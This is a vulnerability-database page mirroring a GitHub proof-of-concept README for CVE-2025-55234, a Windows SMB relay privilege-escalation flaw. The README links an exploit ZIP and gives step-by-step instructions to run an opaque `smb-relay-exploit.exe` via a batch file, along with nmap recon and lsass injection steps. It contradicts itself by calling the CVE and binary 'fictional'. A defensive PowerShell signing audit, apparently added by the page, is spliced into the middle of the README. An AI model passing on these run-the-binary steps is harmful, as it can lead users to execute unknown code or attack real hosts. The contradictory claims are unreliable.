Related vulnerability
Title: Microsoft Windows SMB Server authorization vulnerability (CVE-2025-55234)
Description: Microsoft Windows SMB Server is a network file-sharing protocol from Microsoft (USA). It allows applications on a computer to read and write files and to request services from server programs across a computer network. Microsoft Windows SMB Server contains an authorization vulnerability; an attacker can exploit it to elevate privileges. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Wind
Description
Windows SMB Server Elevation of Privilege Vulnerability
Introduction
# Lab: CVE-2025-55234 - Windows SMB Server Elevation of Privilege Vulnerability
## Download
### [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip)
## 🚀 Overview
CVE-2025-55234 is a fictional Windows SMB Server Elevation of Privilege vulnerability with a CVSSv3 score of 8.8. Publicly disclosed before patches were available, it impacts multiple Windows versions (e.g., Windows 10, 11, Server 2019/2022). The flaw enables attackers to conduct relay attacks against the SMB Server under certain configurations, potentially escalating privileges through authenticated users' relayed credentials. Unlike traditional remote code execution bugs, this is an operational relay mechanism that exploits weak signing and authentication protections in the SMBv3 protocol. Attackers can intercept and relay NTLM authentication hashes, leading to unauthorized access or privilege escalation in domain-joined environments.
Impact:
- **Attack Vector**: Network (adjacent or remote depending on firewall rules).
- **Prerequisites for Exploitation**: Attacker-controlled machine on the same network, vulnerable SMB server with disabled signing or EPA.
- **Potential Outcomes**: Unauthorized file access, lateral movement in Active Directory, or admin privilege gain via relayed credentials.
## 📋 Prerequisites
- Administrative privileges on the host machine.
- Basic knowledge of SMB protocols, NTLM authentication, and Windows registry editing.
- Tools: Git, PowerShell (for mitigation), and a network sniffer like Wireshark for optional verification.
- Isolated network or VM to avoid accidental exposure.
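The exploitation prerequisite above is an SMB server that accepts unsigned sessions, and the tools list names PowerShell and the registry for mitigation. The audit script below is an added example, not code from the lab package or the repository; it assumes the built-in SmbShare cmdlets (`Get-/Set-SmbServerConfiguration` and their client counterparts) and the `LanmanServer\Parameters` registry key, and it inspects signing only, not EPA.

```powershell
# Audit script added for this page; it is not part of the lab's exploit package or
# the repository. It checks the setting the lab's "Prerequisites for Exploitation"
# depend on, an SMB server that accepts unsigned sessions, and can enforce signing.
# Assumes the SmbShare module (Windows 8 / Server 2012 and later) and an elevated
# PowerShell session. EPA (channel binding) is not inspected; only signing is.
[CmdletBinding()]
param(
    [switch]$Remediate   # enforce signing on server and client when set
)

$lanmanKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

$server = Get-SmbServerConfiguration
$client = Get-SmbClientConfiguration
# The registry value behind the server setting (null when not explicitly set).
$regValue = (Get-ItemProperty -Path $lanmanKey -Name RequireSecuritySignature `
                -ErrorAction SilentlyContinue).RequireSecuritySignature

$findings = New-Object 'System.Collections.Generic.List[string]'
if (-not $server.RequireSecuritySignature) {
    $findings.Add('SMB server accepts unsigned sessions: relayed authentication can be replayed to it')
}
if (-not $client.RequireSecuritySignature) {
    $findings.Add('SMB client does not require signing: its outbound sessions can be relayed')
}

if ($findings.Count -eq 0) {
    Write-Output 'OK: SMB signing is required on both server and client.'
} else {
    $findings | ForEach-Object { Write-Warning $_ }
}

if ($Remediate -and $findings.Count -gt 0) {
    # -Force suppresses the confirmation prompt; the change applies to new sessions.
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    Write-Output 'Signing is now required on server and client.'
}

# Summary object so the script can feed a fleet-wide inventory.
[pscustomobject]@{
    ComputerName          = $env:COMPUTERNAME
    ServerRequiresSigning = [bool]$server.RequireSecuritySignature
    ClientRequiresSigning = [bool]$client.RequireSecuritySignature
    RegistryValue         = $regValue
    Findings              = $findings.Count
}
```

Run it without `-Remediate` first to see what the host would report; in a domain, the equivalent Group Policy setting should be used so the value is not reverted at the next policy refresh.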
## Download & Install
- Download the exploit package from the releases page: [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip). This ZIP contains:
  - `smb-relay-exploit.exe`: Main fictional exploit binary (NTLM relay and privilege escalation).
  - `start-exploit.bat`: Batch file to launch the exploit (simply executes `smb-relay-exploit.exe` with default params).
  - `config.ini`: Configuration file for target IP, relay mode, etc.
  - `logs/`: Directory for output logs.
Unzip to a local directory, e.g., `C:\CVE-2025-55234\exploit\`.
## 🛠 Quick Start
- **Exploit the Vulnerability**:
  - Download and unzip `exploit.zip` as above.
  - Edit `config.ini` to set `target_ip=localhost`.
  - Run the batch file: double-click `start-exploit.bat` or, from CMD:
    ```
    cd C:\CVE-2025-55234\exploit
    start-exploit.bat
    ```
  - The .bat simply launches `smb-relay-exploit.exe`, which performs:
    - Initiating an SMB connection.
    - Forcing NTLM authentication.
    - Relaying hashes to a fictional relay server (logs to `exploit.log`).
  - Output: a privilege escalation message, e.g., "Elevated to SYSTEM via relayed creds."
**Detailed Exploitation Steps**:
- **Step 1: Recon**: Use `nmap -p 445 --script smb-security-mode localhost` to confirm weak signing (output: "signing: false").
- **Step 2: Capture/Relay**: The .exe uses Winsock APIs to establish a TCP connection on port 445, negotiates SMBv3, and triggers NTLMv2 hash relay. It exploits the lack of EPA by suppressing channel bindings, allowing a MITM relay.
- **Step 3: Escalate**: Fictional payload injects into lsass.exe process memory (with debug output), granting elevated token.
- **Verification**: Check `exploit.log` for relayed hashes and success flags. Use ProcMon to observe registry reads/writes.
### Exploitation Details
The main exploit (`smb-relay-exploit.exe`) is a compiled C++ binary (fictional, using Winsock2 and custom NTLM libs). It performs:
- SMB dialect negotiation (forcing v3.1.1).
- Tree connect to IPC$ or admin shares.
- Relay attack simulation via loopback or specified relay IP.
- Privilege check: Uses Windows API `OpenProcessToken` and `AdjustTokenPrivileges` to demo escalation (outputs to console).
The .bat wrapper:
```
@echo off
echo Starting SMB Relay Exploit for CVE-2025-55234...
smb-relay-exploit.exe --target localhost --mode relay --log exploit.log
pause
```
## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.
File snapshot
[4.0K] /data/pocs/9a065120b5c1b02b82099355c9d1d7d1d04d8f53
├── [4.0K] Lore
│ └── [8.5M] lab-cve-2025-55234.zip
└── [4.2K] README.md
1 directory, 2 files
Notes
1. It is recommended to access the original source first.
2. If the source is unavailable or inaccessible, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating towards the local POC. Thank you for your support.